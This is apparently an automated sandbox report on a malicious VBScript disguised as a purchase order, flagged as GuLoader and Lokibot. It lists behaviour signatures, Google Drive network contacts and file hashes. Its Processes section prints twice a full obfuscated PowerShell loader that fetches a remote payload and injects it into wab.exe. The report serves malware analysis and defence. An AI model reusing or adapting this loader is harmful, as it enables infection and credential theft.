Analysis Overview
SHA256
9e544c53dffc7c410220f17bc3a9f96f83f98a2bcdaa882183408d5194bf6a9e
Threat Level: Known bad
The file PO 05-03-2024 AKTINA-CDS.vbs was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Lokibot
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
outlook_win_path
outlook_office_path
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-11 14:32
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-11 14:32
Reported
2024-03-11 14:34
Platform
win7-20231129-en
Max time kernel
119s
Max time network
127s
Command Line
Signatures
Guloader,Cloudeye
Lokibot
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1136 set thread context of 2796 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 05-03-2024 AKTINA-CDS.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Baissers Gennemlevet Skovmaare bordlampernes overdepending Tinged Solvation #>;$Tartane=(cmd /c set /A 115^^0);Function Greaseless ([String]$Dampsprre){$Tartane=[char][int]$Tartane;$Singlesculleren=$Tartane+'ubstring';$Saamaskinenndgaar=8;$Artifact=Rigsrevisorloven4($Dampsprre);For($Saamaskinen=7; $Saamaskinen -lt $Artifact; $Saamaskinen+=$Saamaskinenndgaar){$Apeks10=$Dampsprre.$Singlesculleren.Invoke($Saamaskinen, 1);$Rigsrevisorloven=$Rigsrevisorloven+$Apeks10;}$Rigsrevisorloven;}function Signficantly ($Gring){& ($Rigsrevisorloven01) ($Gring);}function Rigsrevisorloven4 ([String]$Argumentspecifikationer){$Forstrke1=$Argumentspecifikationer.Length-1;$Forstrke1;}$Rigsrevisorloven02=Greaseless 'ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ';$berigningernes=Greaseless 'haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenrC.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerweOverdom. KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ixclinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenelAssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendCG.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt scprighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus ';$Rigsrevisorloven01=Greaseless 'ManglediRinninge buliabxunderv ';$Rigsrevisorloven00=Greaseless 'Sej ruk$DelnoeggKedlenslBontebuoLfterbebMacrongaParticulUllings:nonco,gFSubc.ntoUdtydedrVaarbebs VekseltP estigrKvitt rkCir,opheHaiku t8Mis kst Leg,ml=Splodge SteelhSSpexenet C,lpitaRurlgeurUnwishetN nelec-LauraldB Ta ineiIngardstNcarspjsDenotabTLi enyrrBaptisia Fnblgnnste.svisPredictfOmstbnieAntistarSoegete Weake,s-NebulisSAktieliomurksvauInnovatrDommed c UglereeRipston Afmatni$Di gorgb S.kkerepeekab,rMilj raiMisr,lagFlisesenRetroveiS.goejnnSpectacgBeskedee,nvoicirParchisnMes.erieVizslassPrdikat Tuefor-EcstatiDNuancineSe,ologsSoilagetElektroi.onfilinSpyendeaReoperatComakesiSpir tuoOperatin Massse Pi.kups$ AcademFC onicroTramcarrSmands.s ,ortiet TerefarSkndetfk Udf.lieMiskych2Interb ';Signficantly (Greaseless 'Co.tain$.agnomsg An,ulllBagmakeoSvejsefbMedmenna Taalsoleksiler:odontolFUdmaltioRo.ekonrUnhea,esRdmedestKrediterL,ftsrukKjrulffeLagrang2 Nailed=Besl.gs$ balanceWeaklinnTod menvE.sanci:OuttradaRoaredgp AllonypRepo,tedCnidosiaRchitectJordaneaSimulta ') ;Signficantly (Greaseless 'Steg paI leskabmFormyndp nfanteoAandsslr NovemptLaven m-Slid,etM ,andfroAntagondGlan,esuHoutp rlAbund.neSin,fot ArbejdsB ma icbiTryksvatT.rbenssRedeploTAfbankirForn.ftaKorporlnPont.acsuafgjorf upbuoyeSquitterCompreh ') ;$Forstrke2=$Forstrke2+'\Sprgerens.Cav' ;Signficantly (Greaseless 'Condole$FinnmargFormumnl ,ectonoKrybeipbPlankevaCystostl gyptol:AbjectiFInvendioS,dafrirTumefyisSaucematSamtykkr .olysekHalvbueeunderto7 Indpla=Adjoint(CrapaudT NajendeCorrectsHe stnitDekater-PewskenPDcorbeaa Hol.bat ypnothT.olley Reneta$ bullpuFVergerloBradawlr DataposPreco.ftMillasnrdomsto.kMisalt,eSpinope2 krome.) Spiree ') ;while (-not $Forstrke7) {Signficantly (Greaseless 'Fals fiI.lagetof Sta tt Deaconr(Vand va$ Smit.eFTapereroIndustrrFactitisEtrusketOutrivar.lektrok FedthaeDaggrye8markhor.FrifindJMnst.rgoR geligbTvangs.SSubk,tatNeutralaPrestidt AffirmeLrkenpa Appoint-afparereL itancqmandsch Stersky$ByggeleR VakuumiKonjakggScisselsKaprerer DivorceThundervRykkerbiS lfsaisBnli.esoNostalgr,lamodil ForeneoSpadserv Tax,cleHrdneafn Forskr0Kassevo2 Un,len)unfondn Coccoli{Sul rinSVi,tualtBe,ixttaS,gnetrrTruge.st D sire-Sul.anaSSkiftetlIreosoveLich ake LbepompNocerit Virksom1 Paaske}Sheart,eWillfulls.necurs slugteenarcoti{Krom toS Univert sk.vsaamispricrDevisertFission- T milsSLitt ralPaydayseE.spreseBenzinspbestikk Wayment1App.oks;Omprio S,elanchiIntershgAfstikknMagasr.fS,imulaiMetalwocPhytopta Stabe nOve.skatTrbe kyl Affyrey Topbet Spoofed$IndskrnR remindiHornbeagCascromsDuplikerSagestke PoliorvDiscan,inabolagsPrevailobagpiperKonias lFor.udsoKonsulevsham,oceDjvleudn.echeck0Potable0 F,jlre}Portabi ');Signficantly (Greaseless 'Apokope$GadeuorgSulfidelAdminisoStallmabAminoaca Thane,lFormnin:Lobu.itF HjemadoSubstanrGenrefosStorktrtLeveaarrTehuseskPro meneOrdrese7Choledo=Palaeon(FlagdugTPlayfele Vagtlesmotortrt enmoto-millocrP AmmermabygningtMesenteh Aan.sa Trichob$S.isekaF Kva.taoBekendtrPsoralesPhe,ometW,edlinrCharro,kIlluviaehaugesk2Hormone)Opsugni ') ;}Signficantly (Greaseless 'Tegular$VrimlengEng andl.idevenoB naughbK ightaaAfskumnl Quinti: hallotA PolyppvNveombuaAfmattenautopyoiOberstlaUnderst bi che=Bekrfte IdelrerGUnders eTransshtjockey.-G,atbruC ateteroTe egranDetailptAlarmu,e quaes nUnpretet Kodese Coadjut$SongletFHockeykoBow yparMaccabasNeedypetNe.opanr Morakkk kiftereUnhinde2 .ndlin ');Signficantly (Greaseless 'Heterom$ Phyt,ggHeadendlW.shasto spidombBygg saa Ind omlHeksame: Sa,ctiKexcernboNytaarsgOkkupateVirksoms BygakspMatchmarHenaandiDengsertSpkkecotUnbedfae Sorts nAmiasresMercena Skihopp=Accroac Suppler[ BelizeSSpr ngdy,roszyssPolyphot muldreKlevarem erdeop.ModpartCRameousoAffichenUomgn ev profuneModningrProgr.mt Siksak]Corfit :Bisfrak: HarehoFTrffe.irB ligydoHomacanmGulasmaBFjerndia lfactisTerceleeAgkistr6Worce.t4DopingsSLispountBirianirSul,houiSparusmnGeodt.agFalskne( Shortc$ PeriskADisobedvExpensiaFodfolknBu.lcomiSolomonaLi.iere)sekundr ');Signficantly (Greaseless 'Forplig$congealgScenefulUnblindoTvangsfbbermudaa Spade,l ,vangl:Folkl,rR CachuaiProlifegOverrassFibromerMrkningeUnder rvFrigreliVividvisProletaoFr sager Sl etrl Sj.tteoStavbaavBeinlyaeBayonnenDvelrer2Tautego Returko=.nlaure Vildsku[Unde,kuStegneseyOrganogsKinostetOutgaineKvaseh.m U.beau.LectureTclacklie,amnonixAgnyomstUnresem. PellitEAntioxinBa,talecB,llatao patterdDefineriUltrafinanthracgS.miorg]Fase um:Berl ne:Demole ASa dierSLatyrusCUnree,eI KinesiIstyrtdy.vildmndG PinchpeFyldetstAfknapsS KertertErgoterrEyeglasi psychrnLio.neagscirocc(Tensio.$Par.plyKPrepareoMo.elfogForn teeTopdelesSu.fonapUndergrrTankeeki FanebltRaillert Flerkoeisotenin SchismsFluorid)Cdgchau ');Signficantly (Greaseless 'Unmedic$compagngAn.ennelMatematoApoteksbFri.hteaUdp,ntelsuccour:TopbetjR Slgendi unexplg,ervekrsSekraftrPtilotae glennsvEntomoliSamanfesCystosyo durganruforesplFungiteo Radforv,verstaeDroschenTerras.3.amenen=Stegefe$,edsaltRImbeciliPr,gramg.tikdaas OmbrinrStrongyeRati,navBrnd,mriChastitsAsymmetog,andoar TuberclSubmucoocrackmavVkstbeteMilieubnC.illin2Hftetsb.Tr,holds,steriau Ru,egobBugspytsTramlintLitt,rtrDesillui SergelnMillen,gFravnni( Nyopre3 E fing2Frances2 Str so4 Po.ari7Equipoi2 Anpart,mismeas3Carragh1Syn.opa2Lugedes6Gos ipi1S.spect) Afsk,b ');Signficantly $Rigsrevisorloven3;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Baissers Gennemlevet Skovmaare bordlampernes overdepending Tinged Solvation #>;$Tartane=(cmd /c set /A 115^^0);Function Greaseless ([String]$Dampsprre){$Tartane=[char][int]$Tartane;$Singlesculleren=$Tartane+'ubstring';$Saamaskinenndgaar=8;$Artifact=Rigsrevisorloven4($Dampsprre);For($Saamaskinen=7; $Saamaskinen -lt $Artifact; $Saamaskinen+=$Saamaskinenndgaar){$Apeks10=$Dampsprre.$Singlesculleren.Invoke($Saamaskinen, 1);$Rigsrevisorloven=$Rigsrevisorloven+$Apeks10;}$Rigsrevisorloven;}function Signficantly ($Gring){& ($Rigsrevisorloven01) ($Gring);}function Rigsrevisorloven4 ([String]$Argumentspecifikationer){$Forstrke1=$Argumentspecifikationer.Length-1;$Forstrke1;}$Rigsrevisorloven02=Greaseless 'ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ';$berigningernes=Greaseless 'haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenrC.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerweOverdom. KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ixclinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenelAssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendCG.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt scprighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus ';$Rigsrevisorloven01=Greaseless 'ManglediRinninge buliabxunderv ';$Rigsrevisorloven00=Greaseless 'Sej ruk$DelnoeggKedlenslBontebuoLfterbebMacrongaParticulUllings:nonco,gFSubc.ntoUdtydedrVaarbebs VekseltP estigrKvitt rkCir,opheHaiku t8Mis kst Leg,ml=Splodge SteelhSSpexenet C,lpitaRurlgeurUnwishetN nelec-LauraldB Ta ineiIngardstNcarspjsDenotabTLi enyrrBaptisia Fnblgnnste.svisPredictfOmstbnieAntistarSoegete Weake,s-NebulisSAktieliomurksvauInnovatrDommed c UglereeRipston Afmatni$Di gorgb S.kkerepeekab,rMilj raiMisr,lagFlisesenRetroveiS.goejnnSpectacgBeskedee,nvoicirParchisnMes.erieVizslassPrdikat Tuefor-EcstatiDNuancineSe,ologsSoilagetElektroi.onfilinSpyendeaReoperatComakesiSpir tuoOperatin Massse Pi.kups$ AcademFC onicroTramcarrSmands.s ,ortiet TerefarSkndetfk Udf.lieMiskych2Interb ';Signficantly (Greaseless 'Co.tain$.agnomsg An,ulllBagmakeoSvejsefbMedmenna Taalsoleksiler:odontolFUdmaltioRo.ekonrUnhea,esRdmedestKrediterL,ftsrukKjrulffeLagrang2 Nailed=Besl.gs$ balanceWeaklinnTod menvE.sanci:OuttradaRoaredgp AllonypRepo,tedCnidosiaRchitectJordaneaSimulta ') ;Signficantly (Greaseless 'Steg paI leskabmFormyndp nfanteoAandsslr NovemptLaven m-Slid,etM ,andfroAntagondGlan,esuHoutp rlAbund.neSin,fot ArbejdsB ma icbiTryksvatT.rbenssRedeploTAfbankirForn.ftaKorporlnPont.acsuafgjorf upbuoyeSquitterCompreh ') ;$Forstrke2=$Forstrke2+'\Sprgerens.Cav' ;Signficantly (Greaseless 'Condole$FinnmargFormumnl ,ectonoKrybeipbPlankevaCystostl gyptol:AbjectiFInvendioS,dafrirTumefyisSaucematSamtykkr .olysekHalvbueeunderto7 Indpla=Adjoint(CrapaudT NajendeCorrectsHe stnitDekater-PewskenPDcorbeaa Hol.bat ypnothT.olley Reneta$ bullpuFVergerloBradawlr DataposPreco.ftMillasnrdomsto.kMisalt,eSpinope2 krome.) Spiree ') ;while (-not $Forstrke7) {Signficantly (Greaseless 'Fals fiI.lagetof Sta tt Deaconr(Vand va$ Smit.eFTapereroIndustrrFactitisEtrusketOutrivar.lektrok FedthaeDaggrye8markhor.FrifindJMnst.rgoR geligbTvangs.SSubk,tatNeutralaPrestidt AffirmeLrkenpa Appoint-afparereL itancqmandsch Stersky$ByggeleR VakuumiKonjakggScisselsKaprerer DivorceThundervRykkerbiS lfsaisBnli.esoNostalgr,lamodil ForeneoSpadserv Tax,cleHrdneafn Forskr0Kassevo2 Un,len)unfondn Coccoli{Sul rinSVi,tualtBe,ixttaS,gnetrrTruge.st D sire-Sul.anaSSkiftetlIreosoveLich ake LbepompNocerit Virksom1 Paaske}Sheart,eWillfulls.necurs slugteenarcoti{Krom toS Univert sk.vsaamispricrDevisertFission- T milsSLitt ralPaydayseE.spreseBenzinspbestikk Wayment1App.oks;Omprio S,elanchiIntershgAfstikknMagasr.fS,imulaiMetalwocPhytopta Stabe nOve.skatTrbe kyl Affyrey Topbet Spoofed$IndskrnR remindiHornbeagCascromsDuplikerSagestke PoliorvDiscan,inabolagsPrevailobagpiperKonias lFor.udsoKonsulevsham,oceDjvleudn.echeck0Potable0 F,jlre}Portabi ');Signficantly (Greaseless 'Apokope$GadeuorgSulfidelAdminisoStallmabAminoaca Thane,lFormnin:Lobu.itF HjemadoSubstanrGenrefosStorktrtLeveaarrTehuseskPro meneOrdrese7Choledo=Palaeon(FlagdugTPlayfele Vagtlesmotortrt enmoto-millocrP AmmermabygningtMesenteh Aan.sa Trichob$S.isekaF Kva.taoBekendtrPsoralesPhe,ometW,edlinrCharro,kIlluviaehaugesk2Hormone)Opsugni ') ;}Signficantly (Greaseless 'Tegular$VrimlengEng andl.idevenoB naughbK ightaaAfskumnl Quinti: hallotA PolyppvNveombuaAfmattenautopyoiOberstlaUnderst bi che=Bekrfte IdelrerGUnders eTransshtjockey.-G,atbruC ateteroTe egranDetailptAlarmu,e quaes nUnpretet Kodese Coadjut$SongletFHockeykoBow yparMaccabasNeedypetNe.opanr Morakkk kiftereUnhinde2 .ndlin ');Signficantly (Greaseless 'Heterom$ Phyt,ggHeadendlW.shasto spidombBygg saa Ind omlHeksame: Sa,ctiKexcernboNytaarsgOkkupateVirksoms BygakspMatchmarHenaandiDengsertSpkkecotUnbedfae Sorts nAmiasresMercena Skihopp=Accroac Suppler[ BelizeSSpr ngdy,roszyssPolyphot muldreKlevarem erdeop.ModpartCRameousoAffichenUomgn ev profuneModningrProgr.mt Siksak]Corfit :Bisfrak: HarehoFTrffe.irB ligydoHomacanmGulasmaBFjerndia lfactisTerceleeAgkistr6Worce.t4DopingsSLispountBirianirSul,houiSparusmnGeodt.agFalskne( Shortc$ PeriskADisobedvExpensiaFodfolknBu.lcomiSolomonaLi.iere)sekundr ');Signficantly (Greaseless 'Forplig$congealgScenefulUnblindoTvangsfbbermudaa Spade,l ,vangl:Folkl,rR CachuaiProlifegOverrassFibromerMrkningeUnder rvFrigreliVividvisProletaoFr sager Sl etrl Sj.tteoStavbaavBeinlyaeBayonnenDvelrer2Tautego Returko=.nlaure Vildsku[Unde,kuStegneseyOrganogsKinostetOutgaineKvaseh.m U.beau.LectureTclacklie,amnonixAgnyomstUnresem. PellitEAntioxinBa,talecB,llatao patterdDefineriUltrafinanthracgS.miorg]Fase um:Berl ne:Demole ASa dierSLatyrusCUnree,eI KinesiIstyrtdy.vildmndG PinchpeFyldetstAfknapsS KertertErgoterrEyeglasi psychrnLio.neagscirocc(Tensio.$Par.plyKPrepareoMo.elfogForn teeTopdelesSu.fonapUndergrrTankeeki FanebltRaillert Flerkoeisotenin SchismsFluorid)Cdgchau ');Signficantly (Greaseless 'Unmedic$compagngAn.ennelMatematoApoteksbFri.hteaUdp,ntelsuccour:TopbetjR Slgendi unexplg,ervekrsSekraftrPtilotae glennsvEntomoliSamanfesCystosyo durganruforesplFungiteo Radforv,verstaeDroschenTerras.3.amenen=Stegefe$,edsaltRImbeciliPr,gramg.tikdaas OmbrinrStrongyeRati,navBrnd,mriChastitsAsymmetog,andoar TuberclSubmucoocrackmavVkstbeteMilieubnC.illin2Hftetsb.Tr,holds,steriau Ru,egobBugspytsTramlintLitt,rtrDesillui SergelnMillen,gFravnni( Nyopre3 E fing2Frances2 Str so4 Po.ari7Equipoi2 Anpart,mismeas3Carragh1Syn.opa2Lugedes6Gos ipi1S.spect) Afsk,b ');Signficantly $Rigsrevisorloven3;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 88.221.134.146:80 | crl.microsoft.com | tcp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
Files
memory/1212-16-0x000000001B6E0000-0x000000001B9C2000-memory.dmp
memory/1212-17-0x0000000002870000-0x0000000002878000-memory.dmp
memory/1212-18-0x0000000002CA0000-0x0000000002CC2000-memory.dmp
memory/1212-19-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1212-20-0x0000000002D40000-0x0000000002DC0000-memory.dmp
memory/1212-21-0x0000000002AB0000-0x0000000002AC2000-memory.dmp
memory/1212-22-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1212-23-0x0000000002D40000-0x0000000002DC0000-memory.dmp
memory/1212-24-0x0000000002D40000-0x0000000002DC0000-memory.dmp
memory/1212-25-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DQXVUI804L86F8K9D92.temp
| MD5 | ca01db601cb05e0bfb553367bd49d033 |
| SHA1 | a68268457978b2ff2d9d5329883b57709adf3f44 |
| SHA256 | 64c45a706f3d8ef66def539981f84534d395e9045359136a6d2c1e46d9e8c4f5 |
| SHA512 | 918c5370e72616e8c9de19fd1798145d9883886a39ab8752e1de4e145f27761ad464319eb17e50d470427d2b82c8fd957a619f5cc515f23f6ace11d74a8d130c |
memory/1212-28-0x0000000002D40000-0x0000000002DC0000-memory.dmp
memory/1212-29-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1212-30-0x0000000002D40000-0x0000000002DC0000-memory.dmp
memory/1212-31-0x0000000002D40000-0x0000000002DC0000-memory.dmp
memory/1136-33-0x0000000002CD0000-0x0000000002D10000-memory.dmp
memory/1136-32-0x0000000072D30000-0x00000000732DB000-memory.dmp
memory/1136-34-0x0000000072D30000-0x00000000732DB000-memory.dmp
memory/1212-35-0x0000000002D40000-0x0000000002DC0000-memory.dmp
memory/1136-36-0x0000000002CD0000-0x0000000002D10000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 211771b8306b4df71d2a1099cd2460e9 |
| SHA1 | d1ab514058c1e2058f0904fef16df876addce6be |
| SHA256 | 0e4a23b253b8c9a9f73cc646259ddf001c9ac9c089a3727bb78df33552f37628 |
| SHA512 | e773bb71e4db65c68a5997d380068976facbcab97c03c9f0c2bcd6b0c5b7e821cbb1bc116e78e130805ce45bd9444db9931626168ca767dcd6b54a51d5e5b525 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | ddcde6f00e701c39a183b23e268aa671 |
| SHA1 | fc1bcdc60cc8e9f5e37883539d20ea330edda727 |
| SHA256 | d88738ba308762b61429ac0b4be38b963ab91db5a91d37b00c1a6a05dd96dfd8 |
| SHA512 | 1e1bd6018888c7ee898fdfb252dac9bb4ae4898c1de254dd2c0fe88593180c03694b0368d97b5f8bf94340c67d04584de9754236d86999c7ce42e431b0f7b68b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
memory/1136-53-0x0000000002CD0000-0x0000000002D10000-memory.dmp
memory/1136-54-0x0000000006120000-0x0000000006121000-memory.dmp
memory/1136-55-0x0000000006D50000-0x0000000009B70000-memory.dmp
memory/1136-56-0x0000000006D50000-0x0000000009B70000-memory.dmp
memory/1136-58-0x0000000076CF0000-0x0000000076E99000-memory.dmp
memory/1136-59-0x0000000072D30000-0x00000000732DB000-memory.dmp
memory/1136-60-0x0000000002CD0000-0x0000000002D10000-memory.dmp
memory/1136-61-0x0000000076EE0000-0x0000000076FB6000-memory.dmp
memory/2796-62-0x0000000000A20000-0x0000000003840000-memory.dmp
memory/2796-63-0x0000000076CF0000-0x0000000076E99000-memory.dmp
memory/2796-64-0x0000000076EE0000-0x0000000076FB6000-memory.dmp
memory/2796-65-0x0000000076F16000-0x0000000076F17000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f162ad07b9edfb1bddeb70b568f2466d |
| SHA1 | bc033077f34e28deff7e99265c05a68cf93ab1c0 |
| SHA256 | e1a611bae1f29f2a467af83c6d42186742a43146eea12eee15d4e2995cd8831d |
| SHA512 | 8ee786e70fefd98c67f7ddef244ea957e2e82b69207dd10274169e71685eb081c80c7c85898e81c8203ba4a5ab3ffe7bc31369dce1c19b59e845fb1bcb50e4e2 |
C:\Users\Admin\AppData\Local\Temp\TarC0B1.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
memory/1136-83-0x0000000006D50000-0x0000000009B70000-memory.dmp
memory/2796-87-0x0000000000400000-0x0000000000581000-memory.dmp
memory/1136-91-0x0000000006D50000-0x0000000009B70000-memory.dmp
memory/1212-92-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/2796-96-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2796-97-0x0000000000A20000-0x0000000003840000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-11 14:32
Reported
2024-03-11 14:34
Platform
win10v2004-20240226-en
Max time kernel
144s
Max time network
153s
Command Line
Signatures
Guloader,Cloudeye
Lokibot
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
